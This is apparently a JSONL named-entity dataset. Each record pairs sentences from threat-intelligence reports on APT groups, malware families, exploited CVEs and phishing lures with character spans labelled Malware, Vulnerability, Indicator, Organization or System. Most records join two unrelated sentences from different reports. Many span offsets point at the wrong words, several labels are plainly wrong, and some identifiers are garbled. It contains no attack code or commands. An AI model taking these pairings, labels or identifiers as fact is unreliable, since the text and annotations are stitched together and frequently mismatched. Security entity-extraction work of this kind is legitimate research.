{"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 43, "end": 48, "label": "Malware"}, {"start": 253, "end": 269, "label": "Indicator"}]}
{"text": "FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 83, "end": 91, "label": "Malware"}, {"start": 94, "end": 104, "label": "Malware"}, {"start": 111, "end": 120, "label": "Malware"}, {"start": 232, "end": 248, "label": "Indicator"}]}
{"text": "Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 230, "end": 250, "label": "Malware"}, {"start": 403, "end": 409, "label": "System"}, {"start": 417, "end": 442, "label": "Indicator"}, {"start": 475, "end": 488, "label": "Vulnerability"}, {"start": 503, "end": 515, "label": "Malware"}, {"start": 547, "end": 573, "label": "Malware"}, {"start": 576, "end": 579, "label": "Malware"}]}
{"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 EternalBlue patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 99, "end": 108, "label": "Malware"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 187, "end": 195, "label": "Malware"}, {"start": 196, "end": 208, "label": "Malware"}, {"start": 293, "end": 299, "label": "Malware"}, {"start": 320, "end": 330, "label": "Malware"}, {"start": 403, "end": 409, "label": "System"}, {"start": 417, "end": 442, "label": "Indicator"}, {"start": 475, "end": 488, "label": "Vulnerability"}, {"start": 503, "end": 515, "label": "Malware"}, {"start": 547, "end": 573, "label": "Malware"}, {"start": 576, "end": 579, "label": "Malware"}]}
{"text": "Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": [{"start": 68, "end": 81, "label": "Malware"}, {"start": 153, "end": 166, "label": "Malware"}, {"start": 255, "end": 268, "label": "Indicator"}, {"start": 278, "end": 285, "label": "Vulnerability"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 298, "end": 313, "label": "System"}, {"start": 314, "end": 327, "label": "Vulnerability"}, {"start": 330, "end": 343, "label": "Vulnerability"}]}
{"text": "We will provide an analysis of the HyperBro tool in an upcoming section . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": [{"start": 0, "end": 2, "label": "Organization"}, {"start": 35, "end": 43, "label": "Malware"}, {"start": 171, "end": 174, "label": "Organization"}, {"start": 196, "end": 203, "label": "Indicator"}]}
{"text": "Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool .", "spans": [{"start": 45, "end": 57, "label": "Malware"}, {"start": 70, "end": 89, "label": "Malware"}, {"start": 206, "end": 215, "label": "System"}, {"start": 235, "end": 249, "label": "Organization"}, {"start": 286, "end": 289, "label": "Organization"}, {"start": 326, "end": 331, "label": "Indicator"}]}
{"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network .", "spans": [{"start": 63, "end": 76, "label": "System"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 194, "end": 203, "label": "Malware"}, {"start": 296, "end": 317, "label": "Malware"}]}
{"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 109, "end": 122, "label": "Vulnerability"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 173, "end": 182, "label": "Indicator"}, {"start": 195, "end": 201, "label": "Malware"}]}
{"text": "The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . The malicious loader will use dynamic-link library ( DLL ) hijacking \u2014 injecting malicious code into a process of a file/application \u2014 on sidebar.exe and launch dllhost.exe ( a normal file ) .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 149, "end": 159, "label": "Malware"}, {"start": 232, "end": 252, "label": "System"}, {"start": 255, "end": 258, "label": "System"}, {"start": 340, "end": 351, "label": "Indicator"}, {"start": 363, "end": 374, "label": "Indicator"}]}
{"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less\u201d aspect of this method . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate .", "spans": [{"start": 8, "end": 15, "label": "Malware"}, {"start": 27, "end": 34, "label": "Malware"}, {"start": 191, "end": 202, "label": "Indicator"}]}
{"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 53, "end": 61, "label": "Malware"}, {"start": 173, "end": 176, "label": "Malware"}, {"start": 198, "end": 207, "label": "Indicator"}, {"start": 291, "end": 304, "label": "Vulnerability"}, {"start": 360, "end": 374, "label": "System"}, {"start": 375, "end": 390, "label": "Vulnerability"}]}
{"text": "The main payload is usually Imminent Monitor RAT ; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure .", "spans": [{"start": 37, "end": 48, "label": "Malware"}, {"start": 116, "end": 134, "label": "Malware"}, {"start": 137, "end": 148, "label": "Malware"}, {"start": 155, "end": 160, "label": "Malware"}, {"start": 219, "end": 233, "label": "Indicator"}, {"start": 292, "end": 294, "label": "Indicator"}]}
{"text": "In a case in June 2019 , we also noticed Warzone RAT being used . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file .", "spans": [{"start": 41, "end": 52, "label": "Malware"}, {"start": 79, "end": 85, "label": "Organization"}, {"start": 88, "end": 92, "label": "Organization"}, {"start": 148, "end": 151, "label": "Malware"}, {"start": 156, "end": 159, "label": "Malware"}, {"start": 236, "end": 244, "label": "Indicator"}]}
{"text": "Xpert RAT reportedly first appeared in 2011 . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using http://voguextra.com/decoy.doc .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 46, "end": 56, "label": "Organization"}, {"start": 125, "end": 140, "label": "Indicator"}, {"start": 156, "end": 166, "label": "System"}, {"start": 178, "end": 208, "label": "Indicator"}]}
{"text": "The first version of Proyecto RAT\u201d was published at the end of 2010 . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": [{"start": 21, "end": 34, "label": "Malware"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 166, "end": 185, "label": "Indicator"}, {"start": 221, "end": 223, "label": "System"}]}
{"text": "Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" .", "spans": [{"start": 36, "end": 39, "label": "Malware"}, {"start": 100, "end": 114, "label": "System"}, {"start": 150, "end": 159, "label": "Organization"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 256, "end": 273, "label": "Indicator"}]}
{"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 121, "end": 145, "label": "System"}, {"start": 148, "end": 158, "label": "Indicator"}, {"start": 288, "end": 305, "label": "Indicator"}]}
{"text": "On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents .", "spans": [{"start": 66, "end": 76, "label": "Malware"}, {"start": 138, "end": 144, "label": "System"}, {"start": 194, "end": 208, "label": "Malware"}, {"start": 228, "end": 243, "label": "Indicator"}]}
{"text": "Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable .", "spans": [{"start": 20, "end": 31, "label": "Malware"}, {"start": 96, "end": 101, "label": "Organization"}, {"start": 175, "end": 194, "label": "Malware"}, {"start": 245, "end": 248, "label": "System"}, {"start": 256, "end": 266, "label": "Indicator"}, {"start": 284, "end": 294, "label": "Indicator"}]}
{"text": "In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality .", "spans": [{"start": 75, "end": 88, "label": "Vulnerability"}, {"start": 141, "end": 162, "label": "Organization"}, {"start": 171, "end": 186, "label": "Organization"}, {"start": 208, "end": 214, "label": "Malware"}, {"start": 218, "end": 226, "label": "Malware"}, {"start": 284, "end": 290, "label": "Malware"}, {"start": 322, "end": 326, "label": "Indicator"}]}
{"text": "Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" .", "spans": [{"start": 50, "end": 56, "label": "Organization"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 125, "end": 147, "label": "System"}, {"start": 193, "end": 201, "label": "Malware"}, {"start": 288, "end": 304, "label": "Indicator"}, {"start": 333, "end": 351, "label": "Malware"}, {"start": 371, "end": 373, "label": "System"}]}
{"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier .", "spans": [{"start": 99, "end": 108, "label": "Malware"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 189, "end": 197, "label": "Malware"}, {"start": 198, "end": 210, "label": "Malware"}, {"start": 295, "end": 301, "label": "Malware"}, {"start": 322, "end": 332, "label": "Malware"}, {"start": 361, "end": 382, "label": "Indicator"}, {"start": 393, "end": 408, "label": "Malware"}]}
{"text": "The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 43, "end": 56, "label": "System"}, {"start": 264, "end": 277, "label": "Vulnerability"}, {"start": 315, "end": 326, "label": "Indicator"}, {"start": 344, "end": 354, "label": "Indicator"}, {"start": 400, "end": 408, "label": "Malware"}]}
{"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 .", "spans": [{"start": 63, "end": 76, "label": "System"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 194, "end": 203, "label": "Malware"}, {"start": 223, "end": 238, "label": "Indicator"}]}
{"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 109, "end": 122, "label": "Vulnerability"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 237, "end": 250, "label": "Vulnerability"}, {"start": 253, "end": 266, "label": "Vulnerability"}, {"start": 270, "end": 283, "label": "Vulnerability"}]}
{"text": "To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload .", "spans": [{"start": 31, "end": 46, "label": "Organization"}, {"start": 51, "end": 71, "label": "System"}, {"start": 94, "end": 106, "label": "System"}, {"start": 117, "end": 126, "label": "System"}, {"start": 189, "end": 203, "label": "Vulnerability"}, {"start": 209, "end": 218, "label": "System"}, {"start": 340, "end": 356, "label": "Indicator"}, {"start": 360, "end": 372, "label": "Indicator"}]}
{"text": "This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": [{"start": 75, "end": 91, "label": "Organization"}, {"start": 164, "end": 178, "label": "Indicator"}, {"start": 200, "end": 226, "label": "Organization"}, {"start": 241, "end": 248, "label": "Organization"}, {"start": 267, "end": 288, "label": "Organization"}]}
{"text": "In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task .", "spans": [{"start": 11, "end": 27, "label": "Organization"}, {"start": 96, "end": 104, "label": "Vulnerability"}, {"start": 174, "end": 180, "label": "Indicator"}]}
{"text": "The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website .", "spans": [{"start": 22, "end": 26, "label": "Organization"}, {"start": 81, "end": 94, "label": "Vulnerability"}, {"start": 131, "end": 137, "label": "Indicator"}]}
{"text": "This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro\u2019s Zero Day Initiative (ZDI) that was just patched this April . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate .", "spans": [{"start": 25, "end": 38, "label": "Vulnerability"}, {"start": 90, "end": 103, "label": "Organization"}, {"start": 195, "end": 206, "label": "Malware"}, {"start": 214, "end": 221, "label": "Vulnerability"}]}
{"text": "The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system .", "spans": [{"start": 4, "end": 8, "label": "Organization"}, {"start": 99, "end": 112, "label": "Vulnerability"}, {"start": 116, "end": 129, "label": "Vulnerability"}, {"start": 161, "end": 167, "label": "Indicator"}, {"start": 197, "end": 204, "label": "Vulnerability"}]}
{"text": "In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 109, "end": 123, "label": "Vulnerability"}, {"start": 314, "end": 348, "label": "Indicator"}]}
{"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 121, "end": 145, "label": "System"}, {"start": 152, "end": 167, "label": "Indicator"}, {"start": 218, "end": 229, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 303, "end": 312, "label": "Organization"}]}
{"text": "Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 157, "end": 166, "label": "Organization"}, {"start": 193, "end": 202, "label": "Indicator"}, {"start": 214, "end": 227, "label": "Vulnerability"}]}
{"text": "On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 .", "spans": [{"start": 18, "end": 25, "label": "Organization"}, {"start": 35, "end": 40, "label": "Organization"}, {"start": 83, "end": 96, "label": "Vulnerability"}, {"start": 109, "end": 132, "label": "Organization"}, {"start": 183, "end": 194, "label": "Indicator"}, {"start": 313, "end": 319, "label": "Malware"}, {"start": 326, "end": 337, "label": "Malware"}, {"start": 358, "end": 364, "label": "Organization"}]}
{"text": "Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 11, "end": 20, "label": "Organization"}, {"start": 69, "end": 74, "label": "Organization"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 212, "end": 223, "label": "Indicator"}, {"start": 246, "end": 257, "label": "Indicator"}, {"start": 296, "end": 312, "label": "Malware"}]}
{"text": "Kaspersky first became aware of BlackOasis\u2019 activities in May 2016 , while investigating another Adobe Flash zero day . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 32, "end": 43, "label": "Organization"}, {"start": 109, "end": 117, "label": "Vulnerability"}, {"start": 124, "end": 135, "label": "Indicator"}, {"start": 199, "end": 221, "label": "System"}, {"start": 224, "end": 228, "label": "System"}]}
{"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover .", "spans": [{"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 100, "end": 115, "label": "Malware"}, {"start": 274, "end": 292, "label": "Malware"}, {"start": 301, "end": 312, "label": "Indicator"}, {"start": 334, "end": 342, "label": "Malware"}]}
{"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B .", "spans": [{"start": 44, "end": 59, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 293, "end": 312, "label": "Organization"}, {"start": 327, "end": 338, "label": "Indicator"}, {"start": 343, "end": 354, "label": "Indicator"}]}
{"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio .", "spans": [{"start": 29, "end": 48, "label": "Malware"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 99, "end": 116, "label": "System"}, {"start": 123, "end": 138, "label": "Indicator"}]}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 228, "end": 235, "label": "Vulnerability"}, {"start": 236, "end": 249, "label": "Vulnerability"}, {"start": 280, "end": 296, "label": "System"}, {"start": 299, "end": 302, "label": "System"}, {"start": 329, "end": 341, "label": "System"}, {"start": 344, "end": 347, "label": "System"}, {"start": 432, "end": 441, "label": "Indicator"}]}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 152, "end": 170, "label": "Indicator"}, {"start": 245, "end": 267, "label": "Organization"}]}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 214, "end": 217, "label": "Indicator"}]}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 125, "end": 149, "label": "Malware"}, {"start": 237, "end": 246, "label": "Indicator"}]}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer .", "spans": [{"start": 28, "end": 48, "label": "Organization"}, {"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 223, "end": 229, "label": "System"}, {"start": 273, "end": 282, "label": "Indicator"}, {"start": 304, "end": 311, "label": "Vulnerability"}, {"start": 321, "end": 327, "label": "Malware"}]}
{"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": [{"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 104, "end": 118, "label": "Malware"}, {"start": 227, "end": 238, "label": "Malware"}, {"start": 241, "end": 257, "label": "Indicator"}, {"start": 264, "end": 278, "label": "Malware"}]}
{"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": [{"start": 64, "end": 88, "label": "Malware"}, {"start": 100, "end": 113, "label": "Vulnerability"}, {"start": 221, "end": 232, "label": "Malware"}, {"start": 235, "end": 251, "label": "Indicator"}, {"start": 258, "end": 272, "label": "Malware"}]}
{"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 30, "end": 57, "label": "Vulnerability"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 119, "end": 133, "label": "Malware"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 156, "end": 172, "label": "System"}, {"start": 175, "end": 188, "label": "Vulnerability"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 265, "end": 276, "label": "Malware"}, {"start": 281, "end": 297, "label": "Indicator"}, {"start": 316, "end": 322, "label": "Malware"}, {"start": 332, "end": 346, "label": "Organization"}, {"start": 356, "end": 367, "label": "Organization"}]}
{"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 19, "end": 32, "label": "Vulnerability"}, {"start": 122, "end": 128, "label": "System"}, {"start": 139, "end": 159, "label": "System"}, {"start": 173, "end": 183, "label": "Indicator"}, {"start": 188, "end": 198, "label": "System"}, {"start": 215, "end": 229, "label": "System"}, {"start": 247, "end": 259, "label": "Indicator"}]}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}, {"start": 94, "end": 102, "label": "Organization"}, {"start": 120, "end": 126, "label": "System"}, {"start": 140, "end": 144, "label": "System"}, {"start": 158, "end": 168, "label": "Indicator"}, {"start": 211, "end": 215, "label": "System"}, {"start": 252, "end": 262, "label": "Organization"}]}
{"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll .", "spans": [{"start": 21, "end": 45, "label": "Malware"}, {"start": 74, "end": 138, "label": "Vulnerability"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 191, "end": 201, "label": "Indicator"}, {"start": 265, "end": 276, "label": "Indicator"}, {"start": 299, "end": 302, "label": "System"}, {"start": 309, "end": 320, "label": "Indicator"}]}
{"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 41, "end": 49, "label": "Malware"}, {"start": 65, "end": 78, "label": "Vulnerability"}, {"start": 130, "end": 139, "label": "Indicator"}, {"start": 182, "end": 202, "label": "System"}]}
{"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name \u2014 either KBDLV2.DLL or AUTO.DLL , depending on the malware sample .", "spans": [{"start": 5, "end": 18, "label": "Malware"}, {"start": 68, "end": 81, "label": "Malware"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 346, "end": 353, "label": "System"}, {"start": 400, "end": 410, "label": "Indicator"}, {"start": 414, "end": 422, "label": "Indicator"}]}
{"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits .", "spans": [{"start": 43, "end": 52, "label": "Malware"}, {"start": 68, "end": 81, "label": "Vulnerability"}, {"start": 169, "end": 184, "label": "Malware"}, {"start": 185, "end": 192, "label": "Malware"}, {"start": 226, "end": 244, "label": "Malware"}, {"start": 247, "end": 251, "label": "Indicator"}, {"start": 292, "end": 316, "label": "Malware"}, {"start": 322, "end": 348, "label": "Malware"}]}
